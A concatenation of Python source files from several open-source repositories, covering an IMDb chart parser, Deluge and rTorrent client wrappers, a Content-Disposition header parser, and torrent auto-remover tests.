yaml_file = os.path.join(self.app_folder, self.config.yaml_file.split("/")[-1])
if self.app_folder_exists():
if not os.path.exists(yaml_file):
self.add_config_file()
with open(yaml_file) as f:
yaml_conf = yaml.load(f)
return yaml_conf
else:
self.error("app folder: {p} doesn't exist\nTry \"cert init\" or \"cert config edit\" to create app folder"
.format(p=self.app_folder))
def app_folder_exists(self):
"""
Check is app folder path exists
:return:
"""
if os.path.exists(self.app_folder):
return True
return False
def get_options(self):
return self.opts
def set_options(self, **kwargs):
"""
edit or add items (key and value) to options
:param kwargs:
:return:
"""
for k, v in kwargs.items():
if "config" in k and v is True:
self.opts.update(config=self.get_config(section="config"))
continue
if "san" in k and v:
self.opts.update(san=[str(i) for i in v])
continue
if "size" in k and v:
self.opts.update(size=int(v))
continue
if k and v:
self.opts[k] = v
@staticmethod
def error(message):
click.echo("\n========ERROR========\n{m}\n========ERROR========\n".format(m=message))
raise click.Abort
@staticmethod
def shell(cmd, strip=True, silent=True):
"""
write and return result of shell cmd
:param cmd:
:param strip:
:param silent:
:return:
"""
if not silent:
click.echo('> {}' + cmd)
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
if process.wait() == 0:
if strip:
return process.communicate()[0].rstrip()
return process.communicate()[0]
return ''
class Options(dict):
def __init__(self, *args, **kwargs):
super(Options, self).__init__(*args, **kwargs)
self.item_list = super(Options, self).keys()
def __setitem__(self, key, value):
self.item_list.append(key)
super(Options, self).__setitem__(key, value)
def __iter__(self):
return iter(self.item_list)
def keys(self):
return self.item_list
def values(self):
return [self[key] for key in self]
def itervalues(self):
return (self[key] for key in self)
if __name__ == '__main__':
t = Tools()
print t.about
``` |
{
"source": "JohnDoee/imdbparser",
"score": 3
} |
#### File: imdbparser/imdbparser/chart.py
```python
import re
import sys
from decimal import Decimal
from requests.compat import quote_plus
from .base import Base
from .movie import Movie
class Chart(Base):
base_url = "https://www.imdb.com/chart/%s"
def __init__(self, chart, imdb):
self.chart = chart
self.imdb = imdb
def _get_urls(self):
return [self.base_url % (self.chart,)]
def parse(self, htmls):
super(Chart, self).parse(htmls)
self.results = []
for item_row in self.trees[0].xpath("//tbody[@class='lister-list']/tr"):
poster_column = item_row.xpath(".//td[@class='posterColumn']")[0]
cover = poster_column.xpath(".//img/@src")[0]
if "/nopicture/" in cover:
cover = None
else:
cover = self.cleanup_photo_url(cover)
imdb_id = re.findall(r"/tt(\d+)/", poster_column.xpath(".//a/@href")[0])[0]
rating_text = item_row.xpath(
".//td[contains(@class, 'imdbRating')]/strong/@title"
)
if rating_text:
print(rating_text[0])
rating, votes = re.findall("[0-9.,]+", rating_text[0])
rating = Decimal(rating)
votes = int(votes.replace(",", ""))
year = None
for base_element in item_row.xpath(
".//td[@class='titleColumn']//span[@class='secondaryInfo']/text()"
):
years = re.findall(r"\((\d{4})\)", base_element)
if years:
year = int(years[0])
break
item = Movie(imdb_id, self.imdb)
item.title = item_row.xpath(".//td[@class='titleColumn']//a/text()")[0]
item.year = year
item.cover = cover
item.rating = rating
item.votes = votes
self.results.append(item)
```
#### File: imdbparser/imdbparser/generateadvancedsearchresult.py
```python
import re
from .advancedsearchresult import Option
def enumify(text):
text = re.sub("[ -.]+", "_", text)
text = re.sub(r"[^a-zA-Z0-9_]+", "", text)
text = text.strip("_")
if text.startswith("20th"):
text = "twentieth" + text[4:]
return text.lstrip("012345679").upper()
def generate_function_and_enums(tree):
enums = {}
all_fields = []
for section in tree.xpath("//div[@class='clause']"):
section_title = section.xpath(".//h3/text()")[0]
if (
section_title == "Instant Watch Options"
): # bugged and not all that interesting
continue
if section_title == "Cast/Crew": # Skipped for now
continue
if section_title == "Display Options": # sorting option, not part of the form
continue
input_fields = section.xpath(".//input")
input_field_names = section.xpath(".//input/@name")
select_fields = section.xpath(".//select")
select_field_names = section.xpath(".//select/@name")
is_min_max = (
any(f for f in input_field_names if f.endswith("-min"))
and any(f for f in input_field_names if f.endswith("-max"))
or any(f for f in select_field_names if f.endswith("-min"))
and any(f for f in select_field_names if f.endswith("-max"))
)
if len(input_fields) == 1 and len(select_fields) == 0:
all_fields.append((input_field_names[0], "normal", ""))
elif len(set(input_field_names)) == 1 and len(select_fields) == 0:
field_name = input_field_names[0]
all_fields.append((field_name, "enum", []))
for e in input_fields:
label = section.xpath(f".//label[@for='{e.attrib['id']}']")[0]
if label.text:
label = label.text
else:
label = label.xpath(".//*/@title")[0]
value = e.attrib["value"]
enums.setdefault(enumify(field_name), {})[enumify(label)] = Option(
label, value
)
elif len(select_fields) == 1 and len(input_fields) == 0:
field_name = select_field_names[0]
all_fields.append((field_name, "enum", []))
for field in select_fields[0].xpath(".//option"):
label = field.text
value = field.attrib["value"]
enums.setdefault(enumify(field_name), {})[enumify(label)] = Option(
label, value
)
elif is_min_max:
if select_field_names:
field_name = select_field_names[0][:-4]
else:
field_name = input_field_names[0][:-4]
all_fields.append((field_name, "minmax", ("", "")))
else:
print("Unknown", section_title, input_fields, select_fields)
code = []
code.append("class AS:")
for k, v in enums.items():
code.append(f" class {k}:")
for label, option in v.items():
code.append(f" {label} = {option!r}")
code.append("")
code.append("")
func_args = ", ".join([f"{fn}={v!r}" for (fn, t, v) in all_fields])
code.append("class AdvancedSearchResult(ParseBase):")
code.append(f" def __init__(self, imdb, {func_args}):")
code.append(" self.imdb = imdb")
code.append("")
code.append(" self.query = {}")
for fn, t, v in all_fields:
if t == "normal":
code.append(f" self.query['{fn}'] = {fn}")
elif t == "enum":
code.append(
f" self.query['{fn}'] = ','.join([isinstance(v, str) and v or v.value for v in {fn}])"
)
elif t == "minmax":
code.append(f" self.query['{fn}-min'] = {fn}[0]")
code.append(f" self.query['{fn}-max'] = {fn}[1]")
return "\n".join(code)
```
#### File: imdbparser/imdbparser/__main__.py
```python
import argparse
import logging
from pprint import pprint
def main():
from .imdb import IMDb, CHART_TYPES, AS
parser = argparse.ArgumentParser(description="Fetch info from IMDb")
parser.add_argument("--debug", help="Enable debugging", action="store_true")
subparsers = parser.add_subparsers(help="sub-command help", dest="command")
fetch_parser = subparsers.add_parser(name="fetch")
fetch_parser.add_argument("imdb_id", help="an IMDb id, e.g. tt0120737")
search_parser = subparsers.add_parser(
name="search", description="Search for a movie or tv show"
)
search_parser.add_argument(
"type", help="Type to search for", choices=["tv", "movie"]
)
search_parser.add_argument("title", help="Title to search for")
resolve_parser = subparsers.add_parser(
name="resolve", description="Try to resolve a search into a specific entry"
)
resolve_parser.add_argument(
"type", help="Type to search-resolve for", choices=["tv", "movie"]
)
resolve_parser.add_argument("title", help="Title to search-resolve for")
resolve_parser.add_argument(
"year", help="Year close to the entry", type=int, nargs="?"
)
chart_parser = subparsers.add_parser(name="chart", description="Fetch a chart")
chart_parser.add_argument("type", help="Chart type", choices=CHART_TYPES)
args = parser.parse_args()
if args.debug:
logging.basicConfig(level=logging.DEBUG)
i = IMDb()
movie = None
movies = None
if args.command == "fetch":
movie = i.get_movie(args.imdb_id.lstrip("tt"))
elif args.command == "search":
if args.type == "tv":
movies = i.search_tv_show(args.title)
elif args.type == "movie":
movies = i.search_movie(args.title)
elif args.command == "resolve":
if args.type == "tv":
movie = i.resolve_tv_show(args.title, args.year)
elif args.type == "movie":
movie = i.resolve_movie(args.title, args.year)
elif args.command == "chart":
movies = i.get_chart(args.type)
else:
parser.print_help()
if movie is not None:
movie.fetch()
pprint(movie.__dict__)
print("")
print("More like this")
for recommended_movie in movie.more_like_this:
pprint(recommended_movie.__dict__)
if movies is not None:
movies.fetch()
if movies.results:
for movie in movies.results:
print(movie)
print(movie.__dict__)
else:
print("Nothing found...")
if __name__ == "__main__":
main()
```
#### File: imdbparser/imdbparser/person.py
```python
from .base import Base
class Person(Base):
name = None
base_url = "http://www.imdb.com/name/nm%s/"
def parse(self, html):
super(Person, self).parse(html)
def __repr__(self):
return "<Person fetched=%r imdb_id=%r name=%r>" % (
self.fetched,
self.imdb_id,
self.name,
)
``` |
{
"source": "JohnDoee/libtc",
"score": 2
} |
#### File: libtc/clients/deluge.py
```python
import base64
import hashlib
from datetime import datetime
from pathlib import Path
from urllib.parse import urlencode
import pytz
from deluge_client import DelugeRPCClient, LocalDelugeRPCClient
from deluge_client.client import DelugeClientException
from ..baseclient import BaseClient
from ..bencode import bencode
from ..exceptions import FailedToExecuteException
from ..torrent import TorrentData, TorrentFile, TorrentState
from ..utils import (
calculate_minimum_expected_data,
has_minimum_expected_data,
map_existing_files,
)
class DelugeClient(BaseClient):
identifier = "deluge"
display_name = "Deluge"
keys = [
"name",
"progress",
"state",
"total_size",
"time_added",
"total_uploaded",
"tracker_host",
"upload_payload_rate",
"download_payload_rate",
"label",
]
def __init__(self, host, port, username, password, session_path=None):
self.host = host
self.port = port
self.username = username
self.password = password
self.session_path = session_path and Path(session_path)
@property
def client(self):
return DelugeRPCClient(
host=self.host,
port=self.port,
username=self.username,
password=self.password,
decode_utf8=True,
)
def _fetch_list_result(self, filter):
result = []
try:
with self.client as client:
torrents = client.core.get_torrents_status(filter, self.keys)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
for infohash, torrent_data in torrents.items():
if torrent_data["state"] in ["Seeding", "Downloading"]:
state = TorrentState.ACTIVE
elif torrent_data["state"] in ["Error"]:
state = TorrentState.ERROR
else:
state = TorrentState.STOPPED
result.append(
TorrentData(
infohash,
torrent_data["name"],
torrent_data["total_size"],
state,
torrent_data["progress"],
torrent_data["total_uploaded"],
datetime.utcfromtimestamp(torrent_data["time_added"]).astimezone(
pytz.UTC
),
torrent_data["tracker_host"],
torrent_data["upload_payload_rate"],
torrent_data["download_payload_rate"],
torrent_data.get("label", ""),
)
)
return result
def list(self):
return self._fetch_list_result({})
def list_active(self):
return self._fetch_list_result({"state": "Active"})
def start(self, infohash):
try:
with self.client as client:
client.core.resume_torrent([infohash])
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
def stop(self, infohash):
try:
with self.client as client:
client.core.pause_torrent([infohash])
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
def test_connection(self):
try:
with self.client as client:
return client.core.get_free_space() is not None
except (DelugeClientException, ConnectionError, OSError):
return False
def add(
self,
torrent,
destination_path,
fast_resume=False,
add_name_to_folder=True,
minimum_expected_data="none",
stopped=False,
):
current_expected_data = calculate_minimum_expected_data(
torrent, destination_path, add_name_to_folder
)
if not has_minimum_expected_data(minimum_expected_data, current_expected_data):
raise FailedToExecuteException(
f"Minimum expected data not reached, wanted {minimum_expected_data} actual {current_expected_data}"
)
destination_path = destination_path.resolve()
encoded_torrent = base64.b64encode(bencode(torrent))
infohash = hashlib.sha1(bencode(torrent[b"info"])).hexdigest()
options = {"download_location": str(destination_path), "seed_mode": fast_resume}
if stopped:
options["add_paused"] = True
if not add_name_to_folder:
files = map_existing_files(
torrent, destination_path, add_name_to_folder=False
)
mapped_files = {}
for i, (fp, f, size, exists) in enumerate(files):
mapped_files[i] = str(f)
options["mapped_files"] = mapped_files
try:
with self.client as client:
result = client.core.add_torrent_file(
"torrent.torrent", encoded_torrent, options
)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
if result != infohash:
raise FailedToExecuteException()
def remove(self, infohash):
try:
with self.client as client:
client.core.remove_torrent(infohash, False)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException()
def retrieve_torrentfile(self, infohash):
if not self.session_path:
raise FailedToExecuteException("Session path is not configured")
torrent_path = self.session_path / "state" / f"{infohash}.torrent"
if not torrent_path.is_file():
raise FailedToExecuteException("Torrent file does not exist")
return torrent_path.read_bytes()
def get_download_path(self, infohash):
# Deluge has a download place and an internal mapping relative to the files
# which makes it a bit of a guesswork to figure out the download folder.
# The algorithm we will be using is, multifile and a single shared prefix (also single folder max).
try:
with self.client as client:
torrents = client.core.get_torrents_status(
{"id": [infohash]},
["name", "download_location", "save_path", "files"],
)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException(
"Failed to fetch download_location from Deluge"
)
if not torrents:
raise FailedToExecuteException("Empty result from deluge")
torrent_data = torrents[infohash]
download_location = torrent_data.get(
"download_location", torrent_data.get("save_path")
)
if not download_location:
raise FailedToExecuteException(
"Unable to retrieve a valid download_location"
)
if (
len(torrent_data["files"]) == 1
and "/" not in torrent_data["files"][0]["path"]
):
return Path(download_location)
prefixes = set(f["path"].split("/")[0] for f in torrent_data["files"])
if len(prefixes) == 1:
return Path(download_location) / list(prefixes)[0]
else:
return Path(download_location)
def get_files(self, infohash):
try:
with self.client as client:
torrents = client.core.get_torrents_status(
{"id": [infohash]},
["name", "files", "file_progress"],
)
except (DelugeClientException, ConnectionError, OSError):
raise FailedToExecuteException("Failed to fetch files from Deluge")
torrent_data = torrents[infohash]
files = torrent_data["files"]
file_progress = torrent_data["file_progress"]
is_singlefile = len(files) == 1 and "/" not in files[0]["path"]
result = []
for f, p in zip(files, file_progress):
name = f["path"]
if not is_singlefile:
name = name.split("/", 1)[1]
result.append(TorrentFile(name, f["size"], p * 100))
return result
def serialize_configuration(self):
url = f"{self.identifier}://{self.username}:{self.password}@{self.host}:{self.port}"
query = {}
if self.session_path:
query["session_path"] = str(self.session_path)
if query:
url += f"?{urlencode(query)}"
return url
@classmethod
def auto_configure(cls):
client = LocalDelugeRPCClient()
return cls(client.host, client.port, client.username, client.password)
```
#### File: libtc/clients/rtorrent.py
```python
import logging
import re
from datetime import datetime
from pathlib import Path
from urllib.parse import urlencode, urlsplit
from xml.parsers.expat import ExpatError
from xmlrpc.client import Error as XMLRPCError
from xmlrpc.client import ServerProxy
import pytz
from ..baseclient import BaseClient
from ..bencode import bencode
from ..exceptions import FailedToExecuteException
from ..scgitransport import SCGITransport
from ..torrent import TorrentData, TorrentFile, TorrentState
from ..utils import (
calculate_minimum_expected_data,
get_tracker_domain,
has_minimum_expected_data,
map_existing_files,
)
logger = logging.getLogger(__name__)
def create_proxy(url):
parsed = urlsplit(url)
proto = url.split(":")[0].lower()
if proto == "scgi":
if parsed.netloc:
url = f"http://{parsed.netloc}"
logger.debug(f"Creating SCGI XMLRPC Proxy with url {url}")
return ServerProxy(url, transport=SCGITransport())
else:
path = parsed.path
logger.debug(f"Creating SCGI XMLRPC Socket Proxy with socket file {path}")
return ServerProxy("http://1", transport=SCGITransport(socket_path=path))
else:
logger.debug(f"Creating Normal XMLRPC Proxy with url {url}")
return ServerProxy(url)
def bitfield_to_string(bitfield):
"""
Converts a list of booleans into a bitfield
"""
retval = bytearray((len(bitfield) + 7) // 8)
for piece, bit in enumerate(bitfield):
if bit:
retval[piece // 8] |= 1 << (7 - piece % 8)
return bytes(retval)
class RTorrentClient(BaseClient):
identifier = "rtorrent"
display_name = "rtorrent"
_methods = None
def __init__(self, url, session_path=None, torrent_temp_path=None):
self.url = url
self.proxy = create_proxy(url)
self.session_path = session_path and Path(session_path)
self.torrent_temp_path = torrent_temp_path and Path(torrent_temp_path)
def _fetch_list_result(self, view):
result = []
try:
torrents = self.proxy.d.multicall2(
"",
view,
"d.hash=",
"d.name=",
"d.is_active=",
"d.message=",
"d.size_bytes=",
"d.completed_bytes=",
"d.up.total=",
"d.up.rate=",
"d.down.rate=",
"d.timestamp.finished=",
"t.multicall=,t.url=",
"d.custom1=",
)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
for torrent in torrents:
if torrent[3]:
state = TorrentState.ERROR
elif torrent[2] == 0:
state = TorrentState.STOPPED
else:
state = TorrentState.ACTIVE
progress = (torrent[5] / torrent[4]) * 100
if torrent[10]:
tracker = get_tracker_domain(torrent[10][0][0])
else:
tracker = "None"
result.append(
TorrentData(
torrent[0].lower(),
torrent[1],
torrent[4],
state,
progress,
torrent[6],
datetime.utcfromtimestamp(torrent[9]).astimezone(pytz.UTC),
tracker,
torrent[7],
torrent[8],
torrent[11],
)
)
return result
def get_methods(self):
if self._methods is None:
self._methods = self.proxy.system.listMethods()
return self._methods
def list(self):
return self._fetch_list_result("main")
def list_active(self):
try:
if "spreadsheet_active" not in self.proxy.view.list():
self.proxy.view.add("", "spreadsheet_active")
self.proxy.view.filter(
"", "spreadsheet_active", "or={d.up.rate=,d.down.rate=}"
)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
return self._fetch_list_result("spreadsheet_active")
def start(self, infohash):
try:
self.proxy.d.start(infohash)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
def stop(self, infohash):
try:
self.proxy.d.stop(infohash)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
def test_connection(self):
try:
return self.proxy.system.pid() is not None
except (XMLRPCError, ConnectionError, OSError, ExpatError):
return False
def add(
self,
torrent,
destination_path,
fast_resume=False,
add_name_to_folder=True,
minimum_expected_data="none",
stopped=False,
):
current_expected_data = calculate_minimum_expected_data(
torrent, destination_path, add_name_to_folder
)
if not has_minimum_expected_data(minimum_expected_data, current_expected_data):
raise FailedToExecuteException(
f"Minimum expected data not reached, wanted {minimum_expected_data} actual {current_expected_data}"
)
destination_path = destination_path.resolve()
if fast_resume:
logger.info("Adding fast resume data")
psize = torrent[b"info"][b"piece length"]
pieces = len(torrent[b"info"][b"pieces"]) // 20
bitfield = [True] * pieces
torrent[b"libtorrent_resume"] = {b"files": []}
files = map_existing_files(torrent, destination_path)
current_position = 0
for fp, f, size, exists in files:
logger.debug(f"Handling file {fp!r}")
result = {b"priority": 1, b"completed": int(exists)}
if exists:
result[b"mtime"] = int(fp.stat().st_mtime)
torrent[b"libtorrent_resume"][b"files"].append(result)
last_position = current_position + size
first_piece = current_position // psize
last_piece = (last_position + psize - 1) // psize
for piece in range(first_piece, last_piece):
logger.debug(f"Setting piece {piece} to {exists}")
bitfield[piece] *= exists
current_position = last_position
if all(bitfield):
logger.info("This torrent is complete, setting bitfield to chunk count")
torrent[b"libtorrent_resume"][
b"bitfield"
] = pieces # rtorrent wants the number of pieces when torrent is complete
else:
logger.info("This torrent is incomplete, setting bitfield")
torrent[b"libtorrent_resume"][b"bitfield"] = bitfield_to_string(
bitfield
)
encoded_torrent = bencode(torrent)
cmd = [encoded_torrent]
if add_name_to_folder:
cmd.append(f'd.directory.set="{destination_path!s}"')
else:
cmd.append(f'd.directory_base.set="{destination_path!s}"')
logger.info(f"Sending to rtorrent: {cmd!r}")
try: # TODO: use torrent_temp_path if payload is too big
if stopped:
self.proxy.load.raw("", *cmd)
else:
self.proxy.load.raw_start("", *cmd)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
def remove(self, infohash):
try:
self.proxy.d.erase(infohash)
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException()
def retrieve_torrentfile(self, infohash):
if not self.session_path:
raise FailedToExecuteException("Session path is not configured")
torrent_path = self.session_path / f"{infohash.upper()}.torrent"
if not torrent_path.is_file():
raise FailedToExecuteException("Torrent file does not exist")
return torrent_path.read_bytes()
def get_download_path(self, infohash):
try:
return Path(self.proxy.d.directory(infohash))
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException("Failed to retrieve download path")
def get_files(self, infohash):
result = []
try:
files = self.proxy.f.multicall(
infohash,
"",
"f.path=",
"f.size_bytes=",
"f.completed_chunks=",
"f.size_chunks=",
)
for f in files:
path, size, completed_chunks, size_chunks = f
if completed_chunks > size_chunks:
completed_chunks = size_chunks
if size_chunks == 0:
progress = 0.0
else:
progress = (completed_chunks / size_chunks) * 100
result.append(TorrentFile(path, size, progress))
except (XMLRPCError, ConnectionError, OSError, ExpatError):
raise FailedToExecuteException("Failed to retrieve files")
return result
def serialize_configuration(self):
url = f"{self.identifier}+{self.url}"
query = {}
if self.session_path:
query["session_path"] = str(self.session_path)
if query:
url += f"?{urlencode(query)}"
return url
@classmethod
def auto_configure(cls, path="~/.rtorrent.rc"):
# Does not work with latest rtorrent config
config_path = Path(path).expanduser()
if not config_path.is_file():
raise FailedToExecuteException("Unable to find config file")
try:
config_data = config_path.read_text()
except PermissionError:
raise FailedToExecuteException("Config file not accessible")
scgi_info = re.findall(
r"^\s*scgi_(port|local)\s*=\s*(.+)\s*$", str(config_data), re.MULTILINE
)
if not scgi_info:
raise FailedToExecuteException("No scgi info found in configuration file")
scgi_method, scgi_url = scgi_info[0]
if scgi_method == "port":
scgi_url = scgi_url.strip()
else:
scgi_url = Path(scgi_url.strip()).expanduser().resolve()
client = cls(f"scgi://{scgi_url}")
session_path = Path(client.proxy.session.path()).resolve()
if session_path.is_dir():
client.session_path = session_path
return client
``` |
{
"source": "JohnDoee/pyrfc6266",
"score": 2
} |
#### File: JohnDoee/pyrfc6266/pyrfc6266.py
```python
import re
import typing
import uuid
from dataclasses import dataclass
from typing import List, Tuple, Union
from urllib.parse import unquote, urlparse
from pyparsing import (
CaselessLiteral,
Combine,
Empty,
Literal,
OneOrMore,
Optional,
ParseException,
QuotedString,
Regex,
Word,
ZeroOrMore,
alphas,
)
__all__ = [
"parse",
"parse_filename",
"secure_filename",
"requests_response_to_filename",
"ContentDisposition",
]
@dataclass
class ContentDisposition:
name: str
value: str
token_chars = (
"!#$%&'*+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ^_`<KEY>|~"
)
token_chars_without_wildcard = (
"!#$%&'+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ^_`abcdefghijklmnopqrstuvwxyz|~"
)
token = Word(token_chars)
unencoded_token = Regex(
r"[%s]*[%s]" % (re.escape(token_chars), re.escape(token_chars_without_wildcard))
)
value = token | QuotedString(
quote_char='"', esc_quote='\\"', esc_char="\\", convert_whitespace_escapes=False
) # TODO: make sure it does not parse invalid <any OCTET except CTLs, but including LWS>
ext_value = Combine(
(
CaselessLiteral("UTF-8") | CaselessLiteral("ISO-8859-1") | Empty()
).set_results_name("encoding")
+ Literal("'")
+ Optional(Word(alphas + " ", min=1, max=3)).set_results_name("language")
+ Literal("'")
+ OneOrMore(
Word(
"!#$&+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ^_`abcdefghijklmnopqrstuvwxyz|~"
)
| (Literal("%") + Word("abcdefABCDEF0123456789", exact=2))
).set_results_name("value")
)
disp_ext_parm = (
(unencoded_token + Literal("=")).set_results_name("parm*")
+ value.set_results_name("value*")
) | (
(Combine(unencoded_token + Literal("*")) + Literal("=")).set_results_name("parm*")
+ value.set_results_name("value*")
)
# filename_parm = (Combine(Literal("filename").set_results_name("parm*") + Literal('=')) + value) | (Literal("filename*=") + ext_value)
disp_ext_type = token
# disposition_parm = filename_parm | disp_ext_parm
disposition_parm = disp_ext_parm
disposition_type = (
CaselessLiteral("inline") | CaselessLiteral("attachment") | disp_ext_type
)
parser = disposition_type.set_results_name("type") + ZeroOrMore(
Literal(";") + disposition_parm
) + Optional(";")
INVALID_ISO8859_1_CHARACTERS = set(
bytes(list(range(0, 32)) + list(range(127, 160))).decode("iso-8859-1")
)
def parse(header: str) -> Tuple[str, List[ContentDisposition]]:
"""Parse a Content-Disposition header into its components.
Args:
header: The actual header value as string
Returns:
A tuple consisting of content disposition type and a list
of found dispositions.
"""
parse_result = parser.parse_string(header, parse_all=True)
content_disposition_type = parse_result["type"].lower()
all_content_disposition = []
seen_parms = set()
for parm, value in zip(parse_result.get("parm", []), parse_result.get("value", [])):
parm = "".join(parm)
if parm in seen_parms:
raise ParseException(f"Multiple parms with same name found: {parm}")
seen_parms.add(parm)
parm = parm[:-1].lower()
if parm.endswith("*"):
parse_result_value = ext_value.parse_string(value, parse_all=True)
if "encoding" not in parse_result_value:
continue
encoding = parse_result_value["encoding"].lower()
try:
value = unquote(
"".join(parse_result_value["value"]),
encoding=encoding,
errors="strict",
)
except UnicodeDecodeError:
raise ParseException("Invalid encoding found")
if encoding == "iso-8859-1":
if (
set(value) & INVALID_ISO8859_1_CHARACTERS
): # Python should really do this by itself
raise ParseException("Invalid encoding found")
all_content_disposition.append(ContentDisposition(parm, value))
return content_disposition_type, all_content_disposition
def secure_filename(filename: str) -> str:
"""Rudimentary security for filenames.
Args:
filename: A potentially insecure filename.
Returns:
A likely secure filename.
"""
return filename.replace("\\", "_").replace("/", "_")
def parse_filename(header: str, enforce_content_disposition_type: bool = False) -> str:
"""Returns a safe filename from a content-disposition header
Args:
header: The actual header value as string
enforce_content_disposition_type: Enforce content-disposition type to one of the two known types.
Returns:
None if no filename could be found
str if a filename could be found
"""
content_disposition_type, all_content_disposition = parse(header)
allowed_content_dispositions = ["attachment", "inline"]
if (
enforce_content_disposition_type
and content_disposition_type not in allowed_content_dispositions
):
return None
def normal_filename(content_disposition):
return content_disposition.value
def combine_filename(content_disposition):
filename = content_disposition.value
for i in range(1, 99999):
found_value = False
for name in [f"filename*{i}*", f"filename*{i}"]:
for content_disposition in all_content_disposition:
if content_disposition.name == name:
filename += content_disposition.value
found_value = True
break
if found_value:
break
else:
break
return filename
header_handlers = [
("filename*", normal_filename),
("filename", normal_filename),
("filename*0*", combine_filename),
("filename*0", combine_filename),
]
filename = None
for name, handler_func in header_handlers:
for content_disposition in all_content_disposition:
if content_disposition.name == name:
filename = handler_func(content_disposition)
if filename:
break
if filename:
break
if filename:
filename = secure_filename(filename)
return filename
def requests_response_to_filename(
response, enforce_content_disposition_type: bool = False
) -> str:
"""Turn a requests response into a filename
Args:
response: `requests.Response`
enforce_content_disposition_type: Enforce content-disposition type to one of the two known types.
Returns:
a filename as a string.
"""
content_disposition = response.headers.get("Content-Disposition")
filename = None
if content_disposition:
filename = parse_filename(
content_disposition,
enforce_content_disposition_type=enforce_content_disposition_type,
)
if not filename:
url = urlparse(response.url)
url_path = url.path.lstrip("/")
if url_path:
url_path = url_path.split("/")[-1]
if url_path:
filename = secure_filename(url_path)
if not filename:
filename = f"unknown-{uuid.uuid4()}"
return filename
```
#### File: JohnDoee/pyrfc6266/setup.py
```python
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="pyrfc6266",
version="1.0.2",
author="<NAME>",
author_email="<EMAIL>",
description="RFC6266 implementation in Python",
license="MIT",
url="https://github.com/JohnDoee/pyrfc6266",
py_modules=["pyrfc6266"],
long_description=read('README.md'),
long_description_content_type='text/markdown',
install_requires=[
"pyparsing~=3.0.7",
],
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
],
)
``` |
{
"source": "JohnDoee/rtorrent-automover",
"score": 2
} |
#### File: rtorrent-automover/automover/remover.py
```python
import logging
from datetime import timedelta, datetime
logger = logging.getLogger(__name__)
def handle_remove(client, remover_sites, target_paths, test_mode=False):
for torrent in client.list():
if not torrent.is_complete:
logging.debug('%s is not complete, skipping' % torrent)
continue
if target_paths:
for target_path in target_paths:
if torrent.path.startswith(target_path):
break
else:
logger.debug('%s is not in any known path, skipping' % torrent)
continue
else:
logger.debug('No known taget paths found, seems like we are in removal only mode')
deleted = False
for tracker in torrent.trackers():
for site, t, url, limit in remover_sites:
if url in tracker.lower():
if t == 'ratio':
if limit <= torrent.ratio:
logging.debug('Torrent %s was seeded %s and only %s is required, removing' % (torrent, torrent.ratio, limit))
if not test_mode:
torrent.delete()
deleted = True
break
elif t == 'time':
if datetime.now()-timedelta(hours=int(limit)) > torrent.finish_time:
logging.debug('Torrent %s was finished at %s' % (torrent, torrent.finish_time))
if not test_mode:
torrent.delete()
deleted = True
break
if deleted:
break
```
#### File: automover/test/test_remover.py
```python
import unittest
from datetime import datetime, timedelta
from automover.test.helpers import *
from automover.remover import handle_remove
class TestRemover(unittest.TestCase):
def setUp(self):
self.client = client = DummyClient()
self.torrents = [
DummyTorrent(client, '1', datetime.now(), 0, '/matchpath/', False, True, ['http://matchtracker.com']),
DummyTorrent(client, '2', datetime.now(), 2, '/matchpath/', True, True, ['http://matchtracker.com']),
DummyTorrent(client, '3', datetime.now()-timedelta(hours=20), 0.5, '/matchpath/', True, True, ['http://matchtracker.com']),
DummyTorrent(client, '4', datetime.now()-timedelta(hours=50), 50, '/matchpath/', True, True, ['http://matchtracker.com']),
DummyTorrent(client, '5', datetime.now()-timedelta(hours=50), 50, '/matchpath/', True, True, ['http://matchtracker.com']),
DummyTorrent(client, '6', datetime.now(), 50, '/matchpath/', False, True, ['http://matchtracker.com']),
DummyTorrent(client, '7', datetime.now(), 50, '/matchpath/', True, True, ['http://matchNOTtracker.com']),
DummyTorrent(client, '8', datetime.now(), 50, '/matchNOTpath/', True, True, ['http://matchtracker.com']),
]
self.client.torrents = self.torrents
def test_timed_remove(self):
handle_remove(self.client, {'fakesite1': ('time', 'matchtracker', '3')}, ['/matchpath'])
self.assertEqual([torrent.torrent_id for torrent in self.torrents], ['1', '2', '6', '7', '8'], 'Did not remove correct torrents')
def test_ratio_remove(self):
handle_remove(self.client, {'fakesite1': ('ratio', 'matchtracker', 1.5)}, ['/matchpath'])
self.assertEqual([torrent.torrent_id for torrent in self.torrents], ['1', '3', '6', '7', '8'], 'Did not remove correct torrents')
def test_combined_remove(self):
handle_remove(self.client, {'fakesite1': ('ratio', 'matchtracker', 1.5), 'fakesite2': ('time', 'matchtracker', '3')}, ['/matchpath'])
self.assertEqual([torrent.torrent_id for torrent in self.torrents], ['1', '6', '7', '8'], 'Did not remove correct torrents')
``` |
{
"source": "JohnDoee/spreadsheetui",
"score": 2
} |
#### File: management/commands/execute_jobs.py
```python
import time
from django.core.management.base import BaseCommand
from spreadsheetui.tasks import execute_jobs
class Command(BaseCommand):
help = "Execute all available jobs"
def add_arguments(self, parser):
parser.add_argument("--loop", dest="loop", action="store_true")
def handle(self, *args, **options):
if options["loop"]:
while True:
self.stdout.write(self.style.SUCCESS("Executing jobs"))
execute_jobs()
time.sleep(5)
else:
execute_jobs()
``` |
Subsets and Splits
No community queries yet
